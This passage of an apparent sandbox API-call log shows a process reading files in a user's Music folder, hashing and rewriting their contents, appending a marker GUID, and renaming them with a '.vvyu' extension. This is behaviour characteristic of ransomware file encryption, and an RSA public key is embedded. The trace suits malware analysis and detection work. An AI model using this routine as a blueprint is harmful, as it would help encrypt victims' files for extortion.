KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.538] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0194.539] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0194.539] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.540] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0194.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0194.540] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0194.540] GetLastError () returned 0x0 [0194.540] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0194.540] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0194.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.540] UuidCreate (in: Uuid=0x312fa48 | out: Uuid=0x312fa48) returned 0x0 [0194.540] UuidToStringA (in: Uuid=0x312fa48, StringUuid=0x312fa40 | out: StringUuid=0x312fa40) returned 0x0 [0194.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.540] RpcStringFreeA (in: String=0x312fa40 | out: String=0x312fa40) returned 0x0 [0194.540] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.540] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x6b50) returned 0x2ea79b0 [0194.541] SetFilePointer (in: hFile=0x568, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.541] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2d0d410 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f0) returned 0x2e912b0 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a5b0 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f48 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ae0 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f90 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b40 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b10 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0194.541] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0194.542] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea3a68 [0194.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0194.542] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a50 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2ac8 [0194.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0194.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.543] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a5b0 | out: hHeap=0x620000) returned 1 [0194.544] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0194.544] GetCurrentThreadId () returned 0x66c [0194.544] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2e9fec0 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.545] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.545] GetCurrentThreadId () returned 0x66c [0194.545] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0194.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.546] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.546] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0194.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0194.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0194.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccace8 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b88 [0194.547] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0194.547] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2ac8 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b10 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b28 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ba0 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b70 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2b58 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2bb8 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2b58 [0194.548] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b70 | out: hHeap=0x620000) returned 1 [0194.548] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2ac8 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2ea3a68 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b88 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2bb8 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea3c78 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0194.549] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ac8 | out: hHeap=0x620000) returned 1 [0194.549] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea3e90 [0194.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0194.550] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0194.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0194.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0194.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0194.550] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0194.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0194.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0194.551] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3c78 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e90 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b58 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2ba0 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b10 | out: hHeap=0x620000) returned 1 [0194.552] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b28 | out: hHeap=0x620000) returned 1 [0194.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0194.553] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0194.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0194.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2b40 | out: hHeap=0x620000) returned 1 [0194.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f90 | out: hHeap=0x620000) returned 1 [0194.554] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0194.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccace8 | out: hHeap=0x620000) returned 1 [0194.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0194.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0194.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0194.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0194.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0194.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0194.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0194.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0194.557] WriteFile (in: hFile=0x568, lpBuffer=0x2ea79b0*, nNumberOfBytesToWrite=0x6b45, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2ea79b0*, lpNumberOfBytesWritten=0x312fb14*=0x6b45, lpOverlapped=0x0) returned 1 [0194.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea79b0 | out: hHeap=0x620000) returned 1 [0194.558] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x6b4a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.558] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0194.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0194.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0194.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea3a68 [0194.558] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea3a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0194.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea3e98 [0194.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0194.559] WriteFile (in: hFile=0x568, lpBuffer=0x2ea3e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea3e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0194.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3e98 | out: hHeap=0x620000) returned 1 [0194.560] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0194.560] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0194.560] CloseHandle (hObject=0x568) returned 1 [0194.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0194.561] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x870) returned 0x2ea3a68 [0194.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0194.562] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Music\\esAg2qtf u0s5C0MdPd.mp3" (normalized: "c:\\users\\keecfmwgj\\music\\esag2qtf u0s5c0mdpd.mp3"), lpNewFileName="C:\\Users\\kEecfMwgj\\Music\\esAg2qtf u0s5C0MdPd.mp3.vvyu" (normalized: "c:\\users\\keecfmwgj\\music\\esag2qtf u0s5c0mdpd.mp3.vvyu")) returned 1 [0194.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3a68 | out: hHeap=0x620000) returned 1 [0194.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.563] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0194.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7cf30 | out: hHeap=0x620000) returned 1 [0194.566] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6de5abf0, ftCreationTime.dwHighDateTime=0x1d89aeb, ftLastAccessTime.dwLowDateTime=0x10a99ca0, ftLastAccessTime.dwHighDateTime=0x1d8a5e3, ftLastWriteTime.dwLowDateTime=0x10a99ca0, ftLastWriteTime.dwHighDateTime=0x1d8a5e3, nFileSizeHigh=0x0, nFileSizeLow=0xea4b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IKpVnLx.m4a", cAlternateFileName="")) returned 1 [0194.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2ea0f90 [0194.566] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x5e) returned 0x2cb45f0 [0194.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea0f90 | out: hHeap=0x620000) returned 1 [0194.566] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Music\\IKpVnLx.m4a") returned=".m4a" [0194.567] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Music\\IKpVnLx.m4a" (normalized: "c:\\users\\keecfmwgj\\music\\ikpvnlx.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0194.567] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=59979) returned 1 [0194.567] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0194.570] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0xea25, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.570] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0194.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9610 [0194.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0194.572] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.572] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0xea4b, lpOverlapped=0x0) returned 1 [0194.573] lstrlenA (lpString="-----BEGIN PUBLIC 